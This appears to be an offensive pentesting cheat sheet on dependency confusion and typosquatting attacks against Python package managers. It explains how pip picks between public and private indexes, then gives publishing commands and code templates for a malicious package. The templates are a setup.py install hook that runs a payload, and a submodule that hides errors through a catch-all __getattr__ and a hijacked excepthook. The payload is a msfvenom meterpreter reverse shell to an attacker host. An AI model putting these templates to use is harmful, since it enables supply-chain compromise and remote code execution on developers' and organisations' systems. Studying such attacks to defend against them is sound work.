Dependency Chain Attack

If an application requires a specific package from a custom internal repository, an attacker could upload a malicious package to a public repository with a newer version number. The package manager might then prioritize the malicious package over the official internal one leading to the execution of arbitrary code. So, check if there is a public resource with that repository name, and if not, let's create it. We can also exploit typosquatting an organization's name or a common misspelling.

The main package managers are:

• Python Package Index (PyPI) for Python

• Node Package Manager (NPM) for JavaScript

PyPI

requirements.txt

name-package~=1.1.0

from name_package import mySubModule

Selection Prioritization

Package manager checks multiple repositories:

• Public repository does not find a package -> download the package found in the private repository

• Public repository does contain the package -> will still check both repositories, but will use the one with the newest version, based on the following versioning rule:

  • ~=: Compatible release clause, which will download any version that should be compatible with the requested version. (This assumes that the developer versions the package according to the specification. For example, if some-package~=1.0.0 is requested, 1.0.1, 1.0.5, and 1.0.9 would all match, but 1.2.0 and 2.0.0 would not)

  • ==: Matching clause (wildcards can be used, some-package==1.0.* match 1.0.0 and 1.0.1)

  • <=: Equal or less.

  • >=: Equal or greater

Pip Configuration

For Consumption (PULL)

mkdir -p ~/.config/pip/
touch ~/.config/pip/pip.conf

~/.config/pip/pip.conf

[global]
index-url = https://pypi.org/simple  # default index to use to search
extra-index-url = https://<REPO_URL> # adds additional indexes to search
trusted-host = <REPO_URL> # if uses HTTP instead of HTTPS

For Publishing (PUSH)

touch ~/.pypirc

~/.pypirc

[distutils]
index-servers = 
    <MY_NAME>

[<MY_NAME>]
repository: http://<REPO_URL>/
username: <USER>
password: <PASS>

twine upload -r <MY_NAME> dist/*
twine upload -r http://<REPO_URL>/ -u <USER> -p <PASS> dist/*

We can check uploaded packages

curl -u '<USER>:<PASS>' http://<REPO_URL>/name-package/json

For Remove

curl -u "<USER>:<PASS>" --form ":action=remove_pkg" --form "name=name_package" --form "version=1.1.4" http://<REPO_URL>/

Package Configuration

Setup

└── name-package
    ├── setup.py
    └── name_package
        └── __init__.py
        └── [ mySubModule.py ]

Note: dashes cause issues in Python syntax

Instead of setup.py, we can also use pyproject.toml or setup.cfg.

setup.py

from setuptools import setup, find_packages
setup(
    name='name-package',
    version='1.1.4',
    packages=find_packages(),
    classifiers=[],
    install_requires=[],
    tests_require=[],
)

python3 ./setup.py sdist
# name_package-1.1.4.tar.gz

pip install <PATH>/name_package-1.1.4.tar.gz
pip uninstall name-package

Command Execution

We now have two locations where we can place a payload:

During Installation

If we place yhe payload in setup.py, we can achieve command execution during the installation of the package.

setup.py

...
from setuptools.command.install import install
class Installer(install):
    def run(self):
        install.run(self)
        # <PAYLOAD>
        # msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT>
        # msfconsole with ExitOnSession false and run -jz
        
setup(
    ...
    cmdclass={'install': Installer}
)

During Runtime

We need to know how the developers use the package. Specifically, which submodule they import from the package.

Create a submodule mySubModule.py with a wildcard function inside that will be executed regardless of the name of the function actually called to avoid generating errors. Then we add the payload at the end so that the code is executed when the app imports the package.

name_package/mySubModule.py

import time
import sys

def standardFunction():
    pass
    
def __getattr__(name):
    pass
    return standardFunction
    
def catch_exception(exc_type, exc_value, tb):
    while True:
        time.sleep(1000)

sys.excepthook = catch_exception

# <PAYLOAD>
# msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT>
# msfconsole with ExitOnSession false and run -jz